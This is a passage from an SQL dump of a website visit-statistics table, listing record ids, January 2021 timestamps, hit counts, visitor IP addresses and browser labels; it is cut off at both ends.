3.252.95.12','other'),(550514,1610220730,2,2,0,0,'185.237.217.11','chrome'),(550515,1610220746,1,1,0,0,'193.108.51.254','other'),(550516,1610220755,1,1,0,0,'128.124.152.106','chrome'),(550517,1610221172,1,1,0,0,'92.113.191.140','chrome'),(550518,1610221233,1,1,0,0,'91.196.178.49','chrome'),(550520,1610221234,1,1,0,0,'37.55.224.4','chrome'),(550521,1610221277,1,1,0,0,'91.196.178.183','chrome'),(550522,1610221569,1,1,0,0,'88.155.27.1','chrome'),(550523,1610221634,1,1,0,0,'37.55.225.58','chrome'),(550524,1610221762,1,1,0,0,'173.252.111.18','other'),(550525,1610222110,1,1,0,0,'37.73.71.240','chrome'),(550526,1610222153,1,1,0,0,'173.252.95.12','other'),(550527,1610222381,1,1,0,0,'185.237.217.11','chrome'),(550528,1610223730,1,1,0,0,'195.10.210.210','chrome'),(550529,1610224214,1,1,0,0,'94.153.21.222','chrome'),(550530,1610224293,1,1,0,0,'91.196.178.15','chrome'),(550531,1610224363,1,1,0,0,'178.133.128.48','chrome'),(550532,1610224642,1,1,0,0,'91.196.178.94','chrome'),(550533,1610225217,1,1,0,0,'91.196.178.153','chrome'),(550534,1610225895,1,1,0,0,'173.252.107.117','other'),(550535,1610226279,1,1,0,0,'46.211.21.24','chrome'),(550536,1610226838,1,1,0,0,'91.196.178.12','chrome'),(550537,1610227726,1,1,0,0,'185.237.217.11','chrome'),(550538,1610228208,1,1,0,0,'46.211.65.7','chrome'),(550539,1610228945,1,1,0,0,'173.252.83.24','other'),(550540,1610228946,1,1,0,0,'173.252.83.116','other'),(550541,1610229151,1,1,0,0,'91.196.178.168','chrome'),(550542,1610229196,1,1,0,0,'66.220.149.18','other'),(550543,1610229217,1,1,0,0,'66.220.149.27','other'),(550544,1610229782,1,1,0,0,'173.252.87.2','other'),(550545,1610229802,1,1,0,0,'173.252.87.1','other'),(550546,1610233318,1,1,0,0,'66.249.70.43','chrome'),(550547,1610236156,1,1,0,0,'69.171.251.116','other'),(550548,1610236285,1,1,0,0,'195.10.210.70','chrome'),(550549,1610244128,1,1,0,0,'173.252.83.2','other'),(550550,1610244582,1,0,1,0,'66.249.70.47',''),(550551,1610253022,1,1,0,0,'91.196.178.78','chrome'),(550552,1610253350,1,1,0,0,'163.172.180.25','other'),(550553,1610257367,1,1,0,0,'173.252.127.120','other'),(550554,1610262389,1,1,0,0,'194.44.124.54','other'),(550555,1610263285,1,1,0,0,'91.196.178.94','chrome'),(550556,1610264952,1,1,0,0,'91.196.178.185','chrome'),(550557,1610265677,1,1,0,0,'91.196.178.5','chrome'),(550558,1610266091,1,1,0,0,'46.211.52.4','chrome'),(550559,1610266152,1,1,0,0,'91.196.121.134','chrome'),(550560,1610266631,1,1,0,0,'91.196.178.185','chrome'),(550561,1610267914,1,1,0,0,'173.252.107.43','other'),(550562,1610268177,1,1,0,0,'31.13.127.1','other'),(550563,1610268462,1,1,0,0,'138.246.253.24','chrome'),(550564,1610268868,1,1,0,0,'46.133.65.119','chrome'),(550565,1610269046,1,1,0,0,'37.52.16.176','chrome'),(550566,1610269075,1,1,0,0,'69.171.251.17','other'),(550568,1610269177,1,1,0,0,'69.171.251.28','other'),(550569,1610269316,1,1,0,0,'173.252.111.113','other'),(550570,1610270448,1,1,0,0,'185.237.217.16','chrome'),(550571,1610272805,1,1,0,0,'91.231.43.112','chrome'),(550572,1610272866,1,1,0,0,'185.237.217.11','chrome'),(550573,1610273340,1,1,0,0,'51.158.118.231','other'),(550574,1610273854,1,1,0,0,'91.196.178.146','other'),(550575,1610273880,1,1,0,0,'185.237.217.22','chrome'),(550576,1610273891,1,1,0,0,'37.53.225.189','chrome'),(550577,1610274754,2,2,0,0,'91.196.178.39','chrome'),(550578,1610275972,1,1,0,0,'91.196.178.161','chrome'),(550579,1610278803,1,1,0,0,'209.17.96.98','other'),(550580,1610279010,1,1,0,0,'128.124.141.245','chrome'),(550581,1610279491,1,1,0,0,'94.153.77.8','chrome'),(550582,1610283309,1,1,0,0,'178.95.246.162','chrome'),(550583,1610284659,1,1,0,0,'46.211.63.222','chrome'),(550584,1610284800,1,1,0,0,'176.36.132.63','chrome'),(550585,1610285662,1,1,0,0,'91.196.178.157','chrome'),(550586,1610286102,1,1,0,0,'91.196.178.171','chrome'),(550587,1610286612,1,1,0,0,'173.252.95.117','other'),(550588,1610288361,1,1,0,0,'91.196.178.5','chrome'),(550589,1610288797,1,1,0,0,'31.13.127.7','other'),(550590,1610288927,1,1,0,0,'69.171.251.3','other'),(550591,1610289755,1,1,0,0,'185.237.217.11','chrome'),(550592,1610290739,1,1,0,0,'185.237.217.11','chrome'),(550593,1610292991,1,1,0,0,'173.252.95.2','other'),(550594,1610295099,1,1,0,0,'31.13.127.5','other'),(550595,1610295208,1,1,0,0,'91.196.178.59','chrome'),(550596,1610298043,1,1,0,0,'69.171.251.31','other'),(550597,1610298523,1,1,0,0,'91.196.178.188','chrome'),(550598,1610299352,1,1,0,0,'23.228.109.146','chrome'),(550599,1610302023,1,1,0,0,'173.252.95.22','other'),(550600,1610302213,1,1,0,0,'37.73.121.164','chrome'),(550601,1610302707,1,1,0,0,'173.252.95.11','other'),(550602,1610303968,1,1,0,0,'92.113.126.65','chrome'),(550603,1610304502,1,1,0,0,'91.196.178.30','chrome'),(550604,1610305634,1,1,0,0,'91.196.178.8','chrome'),(550605,1610307793,1,1,0,0,'173.252.95.3','other'),(550606,1610309157,1,1,0,0,'91.196.178.104','chrome'),(550607,1610320641,1,1,0,0,'91.196.178.163','chrome'),(550608,1610322646,1,1,0,0,'31.13.103.21','other'),(550609,1610330091,1,0,1,0,'66.249.70.43',''),(550610,1610339848,1,1,0,0,'173.252.95.113','other'),(550611,1610340608,1,1,0,0,'91.196.178.61','other'),(550612,1610346023,1,1,0,0,'66.220.149.2','other'),(550613,1610348951,1,1,0,0,'69.171.251.30','other'),(550614,1610349944,2,2,0,0,'91.196.178.168','firefox'),(550615,1610359164,1,1,0,0,'91.196.178.75','chrome'),(550616,1610364484,1,1,0,0,'31.13.103.120','other'),(550617,1610364817,1,1,0,0,'46.211.82.74','chrome'),(550618,1610367669,1,1,0,0,'31.13.127.118','other'),(550619,1610369374,1,1,0,0,'88.155.14.204','chrome'),(550620,1610369450,1,1,0,0,'46.211.21.185','chrome'),(550621,1610371989,1,1,0,0,'173.252.95.4','other'),(550622,1610373517,1,1,0,0,'173.252.83.11','other'),(550623,1610378625,1,1,0,0,'66.220.149.32','other'),(550624,1610379322,1,1,0,0,'91.196.178.185','chrome'),(550625,1610379860,1,1,0,0,'66.249.70.45','chrome'),(550626,1610384611,1,1,0,0,'66.249.70.45','chrome'),(550627,1610385965,1,1,0,0,'46.211.92.54','chrome'),(550628,1610388390,1,1,0,0,'173.252.95.20','other'),(550629,1610389926,2,2,0,0,'23.228.109.146','chrome'),(550630,1610392865,1,1,0,0,'173.252.111.116','other'),(550631,1610395433,1,1,0,0,'173.252.95.21','other'),(550632,1610397445,1,1,0,0,'185.212.251.250','chrome'),(550633,1610398316,1,1,0,0,'23.228.109.146','chrome'),(550634,1610399334,1,1,0,0,'46.211.6.152','chrome'),(550635,1610415602,1,0,1,0,'66.249.70.45',''),(550636,1610418154,1,1,0,0,'173.252.83.1','other'),(550637,1610427569,1,1,0,0,'173.252.83.24','other'),(550638,1610427570,1,1,0,0,'173.252.83.117','other'),(550639,1610435651,1,1,0,0,'66.220.149.25','other'),(550640,1610436005,1,1,0,0,'173.252.127.117','other'),(550641,1610441439,1,0,1,0,'66.249.70.45',''),(550642,1610442090,1,1,0,0,'66.249.70.47','chrome'),(550643,1610442201,1,1,0,0,'66.249.70.43','chrome'),(550644,1610444620,1,1,0,0,'91.196.178.34','chrome'),(550645,1610445867,1,1,0,0,'23.228.109.146','chrome'),(550646,1610448731,1,1,0,0,'173.252.127.116','other'),(550647,1610448732,1,1,0,0,'173.252.127.10','other'),(550648,1610448888,1,1,0,0,'66.249.70.47','chrome'),(550649,1610449536,1,1,0,0,'66.249.70.45','chrome'),(550650,1610449796,1,1,0,0,'66.249.70.43','chrome'),(550651,1610451786,1,1,0,0,'173.252.95.15','other'),(550652,1610459263,2,2,0,0,'23.228.109.146','chrome'),(550653,1610463104,1,1,0,0,'51.158.66.83','other'),(550654,1610463942,2,2,0,0,'66.249.70.45','chrome'),(550655,1610466074,1,1,0,0,'173.252.95.20','other'),(550656,1610474575,1,1,0,0,'173.252.95.117','other'),(550657,1610475061,1,1,0,0,'173.252.95.5','other'),(550658,1610481569,1,1,0,0,'173.252.95.12','other'),(550659,1610482238,1,1,0,0,'173.252.95.119','other'),(550660,1610483822,4,4,0,0,'34.83.189.169','chrome'),(550661,1610487653,1,1,0,0,'173.252.95.4','other'),(550662,1610493329,1,1,0,0,'66.220.149.18','other'),(550663,1610495838,1,1,0,0,'51.15.251.143','other'),(550664,1610495912,1,1,0,0,'66.249.70.43','chrome'),(550665,1610496608,1,0,1,0,'66.249.70.45',''),(550666,1610503811,1,0,1,0,'66.249.70.43',''),(550667,1610516104,1,1,0,0,'173.252.95.30','other'),(550668,1610528543,1,1,0,0,'173.252.95.113','other'),(550669,1610532240,1,0,1,0,'66.249.70.43',''),(550670,1610532637,1,1,0,0,'66.249.70.47','chrome'),(550671,1610536186,1,1,0,0,'31.13.115.20','other'),(550672,1610536187,1,1,0,0,'31.13.115.116','other'),(550673,1610542001,2,2,0,0,'66.249.70.43','chrome'),(550674,1610542435,1,1,0,0,'69.171.251.4','other'),(550675,1610546819,1,1,0,0,'173.252.95.5','other'),(550676,1610551073,1,1,0,0,'173.252.111.13','other'),(550677,1610551075,1,1,0,0,'69.171.251.12','other'),(550679,1610551820,1,1,0,0,'173.252.95.15','other'),(550680,1610562325,1,1,0,0,'173.252.83.12','other'),(550681,1610567347,1,1,0,0,'69.171.251.21','other'),(550682,1610567379,1,1,0,0,'69.171.251.20','other'),(550683,1610567469,1,1,0,0,'69.171.251.3','other'),(550684,1610589323,1,0,1,0,'66.249.70.43',''),(550685,1610594186,1,0,1,0,'66.249.70.43',''),(550686,1610595364,1,1,0,0,'66.249.70.47','chrome'),(550687,1610610384,1,1,0,0,'69.171.251.111','other'),(550688,1610612128,1,1,0,0,'66.249.70.47','chrome'),(550689,1610614709,1,1,0,0,'31.13.127.1','other'),(550690,1610614746,1,1,0,0,'173.252.95.28','other'),(550691,1610616958,1,1,0,0,'66.249.70.47','chrome'),(550692,1610617073,1,1,0,0,'138.246.253.24','chrome'),(550693,1610617202,1,1,0,0,'66.249.70.43','chrome'),(550694,1610620066,1,0,1,0,'66.249.70.45',''),(550695,1610625337,1,1,0,0,'31.13.127.15','other'),(550696,1610637330,1,1,0,0,'173.252.83.10','other'),(550697,1610642732,1,1,0,0,'173.252.95.34','other'),(550698,1610643887,1,1,0,0,'31.13.127.7','other'),(550699,1610648850,2,2,0,0,'31.13.127.111','other'),(550700,1610650595,1,1,0,0,'66.249.70.47','chrome'),(550701,1610653958,1,1,0,0,'217.196.161.239','chrome'),(550702,1610655813,1,1,0,0,'66.249.70.47','chrome'),(550703,1610660940,1,1,0,0,'217.196.161.239','chrome'),(550704,1610665624,2,1,1,0,'66.249.70.47',''),(550705,1610667757,2,2,0,0,'66.249.70.45','chrome'),(550706,1610674832,1,0,1,0,'66.249.70.45',''),(550707,1610684065,6,6,0,0,'66.249.70.43','chrome'),(550708,1610684828,1,1,0,0,'66.249.70.47','chrome'),(550709,1610690613,1,1,0,0,'66.249.70.45','chrome'),(550710,1610695838,1,1,0,0,'66.249.70.47','chrome'),(550711,1610695943,3,3,0,0,'66.249.70.43','chrome'),(550712,1610695978,1,1,0,0,'66.249.70.45','chrome'),(550713,1610696898,4,4,0,0,'66.249.70.43','chrome'),(550714,1610696902,2,2,0,0,'66.249.70.45','chrome'),(550715,1610697126,2,2,0,0,'66.249.70.47','chrome'),(550716,1610699305,1,1,0,0,'66.249.70.45','chrome'),(550717,1610700459,1,1,0,0,'69.171.251.7','other'),(550718,1610702794,1,0,1,0,'66.249.70.47',''),(550719,1610707355,2,2,0,0,'66.249.70.45','chrome'),(550720,1610707406,1,1,0,0,'66.249.70.47','chrome'),(550721,1610707447,3,3,0,0,'66.249.70.43','chrome'),(550722,1610711091,2,2,0,0,'18.194.196.202','chrome'),(550723,1610711149,2,2,0,0,'66.249.70.45','chrome'),(550724,1610711153,1,1,0,0,'66.249.70.43','chrome'),(550725,1610714749,1,1,0,0,'173.252.95.21','other'),(550726,1610718705,1,1,0,0,'209.17.96.218','other'),(550727,1610718909,1,1,0,0,'66.249.70.47','chrome'),(550728,1610721640,1,1,0,0,'66.249.70.45','chrome'),(550729,1610727850,2,2,0,0,'66.249.70.43','chrome'),(550730,1610728577,2,0,2,0,'66.249.70.45',''),(550731,1610729726,1,1,0,0,'66.249.70.47','chrome'),(550732,1610734509,6,6,0,0,'66.249.70.43','chrome'),(550733,1610734598,2,2,0,0,'66.249.70.47','chrome'),(550734,1610734792,9,9,0,0,'66.249.70.45','chrome'),(550735,1610735071,2,2,0,0,'185.237.217.11','chrome'),(550736,1610735517,1,1,0,0,'173.252.83.18','other'),(550737,1610735525,1,1,0,0,'66.249.70.47','chrome'),(550738,1610735655,2,2,0,0,'66.249.70.43','chrome'),(550739,1610735703,1,1,0,0,'66.249.70.45','chrome'),(550740,1610737444,1,0,1,0,'66.249.70.43',''),(550741,1610739315,1,1,0,0,'66.249.70.47','chrome'),(550742,1610739403,1,1,0,0,'66.249.70.43','chrome'),(550743,1610742071,1,1,0,0,'66.249.70.47','chrome'),(550744,1610742095,1,1,0,0,'66.249.70.43','chrome'),(550745,1610748378,2,2,0,0,'18.231.94.162','chrome'),(550746,1610753979,1,1,0,0,'66.249.70.47','chrome'),(550747,1610755606,2,2,0,0,'167.114.226.133','firefox'),(550748,1610758298,1,1,0,0,'66.249.70.45','chrome'),(550749,1610758400,1,0,1,0,'66.249.70.47',''),(550750,1610759580,1,1,0,0,'66.249.70.45','chrome'),(550751,1610760345,1,0,1,0,'66.249.70.43',''),(550752,1610773490,1,1,0,0,'46.211.54.96','chrome'),(550753,1610774917,1,0,1,0,'66.249.70.43',''),(550754,1610775569,1,0,1,0,'66.249.70.47',''),(550755,1610776779,1,1,0,0,'66.249.70.45','chrome'),(550756,1610781901,1,0,1,0,'66.249.70.45',''),(550757,1610790801,1,1,0,0,'138.246.253.24','chrome'),(550758,1610799471,1,1,0,0,'66.249.70.45','chrome'),(550759,1610809721,1,1,0,0,'62.122.202.54','chrome'),(550760,1610810940,1,1,0,0,'66.249.70.43','chrome'),(550761,1610818817,1,1,0,0,'66.249.70.47','chrome'),(550762,1610819202,1,1,0,0,'69.171.251.14','other'),(550764,1610819282,1,1,0,0,'31.13.127.119','other'),(550765,1610827940,1,1,0,0,'62.210.79.117','firefox'),(550766,1610830394,1,1,0,0,'173.252.127.117','other'),(550767,1610831662,1,1,0,0,'31.13.127.3','other'),(550768,1610832355,1,1,0,0,'31.13.127.16','other'),(550769,1610834619,1,1,0,0,'173.252.83.118','other'),(550770,1610845854,1,0,1,0,'66.249.70.47',''),(550771,1610861546,1,1,0,0,'66.220.149.35','other'),(550772,1610861675,1,1,0,0,'188.126.73.201','chrome'),(550773,1610865449,1,0,1,0,'66.249.70.47',''),(550774,1610880205,1,1,0,0,'31.13.127.120','other'),(550775,1610897610,1,1,0,0,'69.171.251.29','other'),(550776,1610900959,1,1,0,0,'185.237.217.11','chrome'),(550777,1610902403,1,0,1,0,'66.249.70.43',''),(550778,1610903774,1,0,1,0,'66.249.70.47',''),(550779,1610905393,1,0,1,0,'66.249.70.45',''),(550780,1610908199,1,1,0,0,'69.171.251.119','other'),(550781,1610913751,1,1,0,0,'173.252.95.10','other'),(550782,1610913752,1,1,0,0,'173.252.111.15','other'),(550783,1610931362,1,0,1,0,'66.249.70.43',''),(550784,1610945355,1,1,0,0,'31.13.103.120','other'),(550785,1610951760,1,0,1,0,'66.249.70.47',''),(550786,1610962307,1,1,0,0,'31.13.127.119','other'),(550787,1610962310,1,1,0,0,'69.171.251.26','other'),(550788,1610962993,1,1,0,0,'46.219.205.147','chrome'),(550789,1610970238,2,2,0,0,'18.231.94.162','chrome'),(550790,1610977326,1,1,0,0,'209.17.97.106','other'),(550791,1610977619,1,1,0,0,'139.59.61.144','firefox'),(550792,1610983090,1,1,0,0,'66.249.70.45','chrome'),(550793,1610983100,5,5,0,0,'66.249.70.43','chrome'),(550794,1610983319,2,2,0,0,'66.249.70.47','chrome'),(550795,1610984815,1,1,0,0,'66.249.70.47','chrome'),(550796,1610985461,1,1,0,0,'66.220.149.38','other'),(550797,1610991917,1,0,1,0,'66.249.70.47',''),(550798,1610995134,3,3,0,0,'66.249.70.45','chrome'),(550799,1610995195,3,3,0,0,'66.249.70.43','chrome'),(550800,1610995872,2,2,0,0,'66.249.70.47','chrome'),(550801,1610996635,1,1,0,0,'173.252.83.21','other'),(550802,1610996826,1,1,0,0,'66.249.70.45','chrome'),(550803,1610998234,1,1,0,0,'173.252.111.19','other'),(550804,1610998254,2,2,0,0,'173.252.111.12','other'),(550805,1610998256,1,1,0,0,'173.252.111.116','other'),(550806,1610998257,1,1,0,0,'173.252.95.25','other'),(550807,1610998318,1,1,0,0,'173.252.111.20','other'),(550808,1610998319,1,1,0,0,'173.252.111.24','other'),(550809,1610998322,1,1,0,0,'69.171.251.13','other'),(550810,1610999760,2,2,0,0,'66.249.70.47','chrome'),(550811,1610999761,3,3,0,0,'66.249.70.43','chrome'),(550814,1610999763,2,2,0,0,'66.249.70.45','chrome'),(550815,1611000864,2,2,0,0,'66.249.70.45','chrome'),(550816,1611000865,7,7,0,0,'66.249.70.43','chrome'),(550817,1611001859,11,11,0,0,'66.249.70.45','chrome'),(550819,1611001863,3,3,0,0,'66.249.70.47','chrome'),(550820,1611001864,15,15,0,0,'66.249.70.43','chrome'),(550821,1611009554,1,0,1,0,'66.249.70.43',''),(550822,1611009684,1,0,1,0,'66.249.70.45',''),(550823,1611017771,1,0,1,0,'66.249.70.45',''),(550824,1611038143,2,2,0,0,'66.249.93.116','chrome'),(550825,1611038163,1,1,0,0,'91.196.178.75','chrome'),(550826,1611038290,1,1,0,0,'66.249.70.43','chrome'),(550827,1611038448,2,2,0,0,'66.249.70.45','chrome'),(550828,1611039413,1,1,0,0,'91.196.178.75','chrome'),(550829,1611041321,1,0,1,0,'66.249.70.43',''),(550830,1611044246,4,4,0,0,'66.249.70.45','chrome'),(550831,1611044502,3,3,0,0,'66.249.70.43','chrome'),(550832,1611044657,1,1,0,0,'66.249.70.47','chrome'),(550833,1611051253,1,1,0,0,'173.252.95.14','other'),(550834,1611058554,1,1,0,0,'66.220.149.23','other'),(550836,1611058587,1,1,0,0,'31.13.127.7','other'),(550837,1611058588,1,1,0,0,'31.13.127.2','other'),(550838,1611066788,1,1,0,0,'195.211.136.230','chrome'),(550839,1611067538,3,3,0,0,'91.196.178.75','chrome'),(550840,1611068505,1,1,0,0,'91.196.178.75','chrome'),(550841,1611068653,1,1,0,0,'209.17.97.90','other'),(550842,1611070429,1,1,0,0,'94.153.39.219','chrome'),(550843,1611073239,1,1,0,0,'69.171.251.33','other'),(550844,1611073276,1,1,0,0,'173.252.83.4','other'),(550845,1611073940,1,1,0,0,'31.13.127.3','other'),(550846,1611075063,1,1,0,0,'66.249.93.116','chrome'),(550847,1611075181,1,0,1,0,'66.249.70.47',''),(550848,1611075243,1,1,0,0,'185.237.217.11','chrome'),(550849,1611075289,1,1,0,0,'66.249.70.47','chrome'),(550850,1611075515,1,1,0,0,'66.249.70.45','chrome'),(550851,1611079643,1,1,0,0,'66.220.149.28','other'),(550852,1611082596,1,1,0,0,'173.252.127.32','other'),(550853,1611088291,1,1,0,0,'173.252.111.16','other'),(550854,1611103285,1,0,1,0,'66.249.70.47',''),(550855,1611105548,1,1,0,0,'173.252.95.120','other'),(550856,1611106800,1,1,0,0,'199.244.88.132','chrome'),(550857,1611117513,1,0,1,0,'66.249.70.47',''),(550858,1611121076,1,1,0,0,'66.249.70.47','chrome'),(550859,1611121448,1,1,0,0,'66.249.70.45','chrome'),(550860,1611127410,1,1,0,0,'5.255.253.92','other'),(550861,1611131724,1,1,0,0,'69.171.251.1','other'),(550862,1611143897,1,1,0,0,'194.246.121.170','other'),(550863,1611144131,1,1,0,0,'173.252.83.118','other'),(550864,1611153310,1,0,1,0,'66.249.70.61',''),(550865,1611153599,1,0,1,0,'66.249.70.57',''),(550866,1611156774,1,1,0,0,'31.13.127.16','other'),(550867,1611164774,1,1,0,0,'173.252.127.111','other'),(550868,1611170659,2,2,0,0,'3.8.12.221','chrome'),(550869,1611176491,1,1,0,0,'173.252.83.12','other'),(550870,1611188797,1,0,1,0,'66.249.70.43',''),(550872,1611201463,39,39,0,0,'5.255.253.92','other'),(550873,1611201536,18,18,0,0,'5.45.207.150','other'),(550874,1611201582,3,3,0,0,'5.255.253.87','other'),(550875,1611201737,1,1,0,0,'5.255.231.133','other'),(550876,1611216458,1,1,0,0,'31.13.127.6','other'),(550877,1611217807,1,1,0,0,'66.249.70.47','chrome'),(550878,1611227305,1,0,1,0,'66.249.70.43',''),(550879,1611233533,1,1,0,0,'66.249.70.47','chrome'),(550880,1611235307,2,0,2,0,'66.249.70.45',''),(550881,1611236772,1,1,0,0,'209.17.96.218','other'),(550882,1611238090,1,1,0,0,'66.249.70.43','chrome'),(550883,1611239497,1,1,0,0,'66.249.70.57','chrome'),(550884,1611241190,1,1,0,0,'66.249.70.43','chrome'),(550885,1611242337,2,2,0,0,'66.249.70.47','chrome'),(550886,1611243094,1,1,0,0,'66.249.70.43','chrome'),(550887,1611243292,2,2,0,0,'66.249.70.45','chrome'),(550888,1611243360,2,1,1,0,'66.249.70.47',''),(550889,1611243881,1,1,0,0,'31.13.127.14','other'),(550890,1611244093,2,2,0,0,'66.249.70.43','chrome'),(550891,1611244777,1,0,1,0,'66.249.70.47',''),(550892,1611247291,1,1,0,0,'66.249.70.47','chrome'),(550893,1611247378,1,1,0,0,'66.249.70.45','chrome'),(550894,1611247935,1,1,0,0,'31.13.127.9','other'),(550895,1611248140,1,1,0,0,'173.252.83.18','other'),(550896,1611248546,1,1,0,0,'66.249.70.43','chrome'),(550897,1611249003,1,1,0,0,'66.249.70.45','chrome'),(550898,1611250004,1,1,0,0,'66.249.70.45','chrome'),(550899,1611250848,1,0,1,0,'66.249.70.47',''),(550900,1611251592,2,1,1,0,'66.249.70.47',''),(550901,1611252169,2,2,0,0,'66.249.70.43','chrome'),(550902,1611253500,1,0,1,0,'66.249.70.45',''),(550903,1611253571,1,0,1,0,'66.249.70.43',''),(550904,1611254400,1,1,0,0,'66.249.70.45','chrome'),(550905,1611254401,1,1,0,0,'66.249.70.47','chrome'),(550906,1611254503,2,1,1,0,'66.249.70.43',''),(550907,1611257147,1,0,1,0,'66.249.70.47',''),(550908,1611257300,3,3,0,0,'66.249.70.43','chrome'),(550909,1611257629,1,1,0,0,'66.249.70.45','chrome'),(550910,1611258006,2,2,0,0,'66.249.70.47','chrome'),(550911,1611258929,2,1,1,0,'66.249.70.13',''),(550912,1611259617,1,1,0,0,'66.249.70.13','chrome'),(550913,1611259793,2,2,0,0,'66.249.70.43','chrome'),(550914,1611259912,1,1,0,0,'66.249.70.47','chrome'),(550915,1611260816,2,2,0,0,'66.249.70.45','chrome'),(550916,1611260824,2,2,0,0,'66.249.70.47','chrome'),(550917,1611260885,4,4,0,0,'66.249.70.43','chrome'),(550918,1611261838,1,1,0,0,'173.252.107.19','other'),(550919,1611262455,6,6,0,0,'66.249.70.45','chrome'),(550920,1611262902,4,4,0,0,'66.249.70.47','chrome'),(550921,1611262959,7,7,0,0,'66.249.70.43','chrome'),(550922,1611263512,4,4,0,0,'66.249.70.45','chrome'),(550923,1611264022,3,3,0,0,'66.249.70.43','chrome'),(550924,1611264344,2,2,0,0,'66.249.70.47','chrome'),(550925,1611264797,8,8,0,0,'66.249.70.45','chrome'),(550926,1611265180,13,13,0,0,'66.249.70.43','chrome'),(550927,1611265284,5,5,0,0,'66.249.70.47','chrome'),(550928,1611273231,1,1,0,0,'69.171.251.15','other'),(550929,1611273989,1,1,0,0,'66.249.70.43','chrome'),(550930,1611274308,1,0,1,0,'66.249.70.47',''),(550931,1611278270,7,7,0,0,'66.249.70.43','chrome'),(550932,1611278638,2,2,0,0,'66.249.70.45','chrome'),(550933,1611278811,4,4,0,0,'66.249.70.47','chrome'),(550934,1611282161,2,0,2,0,'66.249.70.43',''),(550935,1611282442,1,1,0,0,'66.249.70.45','chrome'),(550936,1611286595,1,1,0,0,'66.249.70.45','chrome'),(550937,1611287625,1,0,1,0,'66.249.70.43',''),(550938,1611291544,1,1,0,0,'66.249.70.45','chrome'),(550939,1611308174,1,0,1,0,'66.249.70.43',''),(550940,1611310419,1,1,0,0,'66.249.70.47','chrome'),(550941,1611312768,1,1,0,0,'69.171.251.31','other'),(550942,1611315744,1,1,0,0,'66.249.70.47','chrome'),(550943,1611316417,1,1,0,0,'66.249.70.45','chrome'),(550944,1611318191,1,1,0,0,'66.249.70.47','chrome'),(550945,1611322495,1,1,0,0,'66.249.70.47','chrome'),(550946,1611322910,1,1,0,0,'91.196.178.75','chrome'),(550947,1611325967,1,1,0,0,'66.249.70.43','chrome'),(550948,1611330696,1,1,0,0,'66.249.70.47','chrome'),(550949,1611332350,1,0,1,0,'66.249.70.45',''),(550950,1611333650,3,3,0,0,'66.249.70.47','chrome'),(550951,1611334436,1,1,0,0,'66.249.93.118','chrome'),(550952,1611334437,1,1,0,0,'66.249.93.120','chrome'),(550953,1611334575,1,1,0,0,'69.171.251.8','other'),(550954,1611335966,1,1,0,0,'66.249.70.43','chrome'),(550955,1611337685,1,1,0,0,'66.249.70.45','chrome'),(550956,1611337798,1,1,0,0,'66.249.70.43','chrome'),(550957,1611340714,1,1,0,0,'66.249.70.45','chrome'),(550958,1611341326,1,1,0,0,'66.249.70.47','chrome'),(550959,1611342028,1,1,0,0,'66.249.70.43','chrome'),(550960,1611342183,1,1,0,0,'69.171.251.37','other'),(550961,1611342259,3,3,0,0,'176.37.90.125','other'),(550962,1611343712,2,2,0,0,'66.249.70.45','chrome'),(550963,1611345553,1,1,0,0,'66.249.70.43','chrome'),(550964,1611346571,1,0,1,0,'66.249.70.43',''),(550965,1611354118,1,1,0,0,'66.249.70.47','chrome'),(550966,1611355087,1,1,0,0,'66.249.70.45','chrome'),(550967,1611355158,1,1,0,0,'66.249.70.43','chrome'),(550968,1611356228,1,1,0,0,'66.249.70.45','chrome'),(550969,1611366982,1,1,0,0,'66.249.70.59','chrome'),(550970,1611368459,1,1,0,0,'66.249.70.47','chrome'),(550971,1611368676,1,1,0,0,'66.249.70.45','chrome'),(550972,1611371771,2,2,0,0,'66.249.70.45','chrome'),(550973,1611374136,1,0,1,0,'66.249.70.47',''),(550974,1611374422,1,1,0,0,'66.249.70.45','chrome'),(550975,1611384458,1,1,0,0,'66.249.70.45','chrome'),(550976,1611387081,2,2,0,0,'13.228.104.57','chrome'),(550977,1611388050,1,1,0,0,'64.246.165.170','firefox'),(550978,1611388911,1,1,0,0,'74.125.151.47','other'),(550979,1611390861,1,0,1,0,'66.249.70.47',''),(550980,1611395074,2,2,0,0,'109.241.130.196','other'),(550981,1611395867,1,1,0,0,'66.249.70.47','chrome'),(550982,1611396199,1,1,0,0,'66.249.70.43','chrome'),(550983,1611396707,1,1,0,0,'66.249.70.45','chrome'),(550984,1611398929,1,1,0,0,'66.249.70.47','chrome'),(550985,1611399080,1,0,1,0,'66.249.70.45',''),(550986,1611399886,1,1,0,0,'66.249.70.45','chrome'),(550987,1611400206,1,1,0,0,'66.249.70.43','chrome'),(550988,1611403534,1,1,0,0,'66.249.70.43','chrome'),(550989,1611403536,1,0,1,0,'66.249.70.45',''),(550990,1611404555,1,1,0,0,'66.249.70.45','chrome'),(550991,1611404598,1,1,0,0,'66.249.70.43','chrome'),(550992,1611407593,1,1,0,0,'66.249.70.47','chrome'),(550993,1611413074,1,1,0,0,'66.249.70.45','chrome'),(550994,1611414611,2,2,0,0,'66.249.70.47','chrome'),(550995,1611415567,1,1,0,0,'66.249.70.45','chrome'),(550996,1611416171,1,0,1,0,'66.249.70.43',''),(550997,1611420049,2,2,0,0,'66.249.70.43','chrome'),(550998,1611420396,2,2,0,0,'66.249.70.47','chrome'),(550999,1611425513,1,1,0,0,'66.249.70.43','chrome'),(551000,1611425974,1,1,0,0,'69.171.251.27','other'),(551001,1611427702,1,1,0,0,'66.249.70.45','chrome'),(551002,1611430294,1,1,0,0,'66.249.70.47','chrome'),(551003,1611430750,1,1,0,0,'185.102.139.43','chrome'),(551004,1611430753,1,1,0,0,'185.103.252.76','chrome'),(551005,1611436960,1,0,1,0,'66.249.70.45',''),(551006,1611437459,1,1,0,0,'66.249.70.45','chrome'),(551007,1611440013,1,1,0,0,'66.249.70.45','chrome'),(551008,1611441149,1,1,0,0,'66.249.70.43','chrome'),(551009,1611444393,1,1,0,0,'66.249.70.45','chrome'),(551010,1611444749,2,2,0,0,'66.249.70.43','chrome'),(551011,1611448402,2,2,0,0,'66.249.70.45','chrome'),(551012,1611449205,1,0,1,0,'66.249.70.47',''),(551013,1611451762,1,1,0,0,'66.249.70.61','chrome'),(551014,1611457405,1,1,0,0,'5.255.231.187','other'),(551015,1611457642,2,2,0,0,'35.181.112.20','chrome'),(551016,1611457767,1,1,0,0,'66.249.70.45','chrome'),(551017,1611459839,1,1,0,0,'66.249.70.47','chrome'),(551018,1611465550,1,1,0,0,'66.249.70.47','chrome'),(551019,1611469104,2,2,0,0,'66.249.70.45','chrome'),(551020,1611469686,2,2,0,0,'52.30.16.188','chrome'),(551021,1611470787,2,2,0,0,'66.249.70.47','chrome'),(551022,161147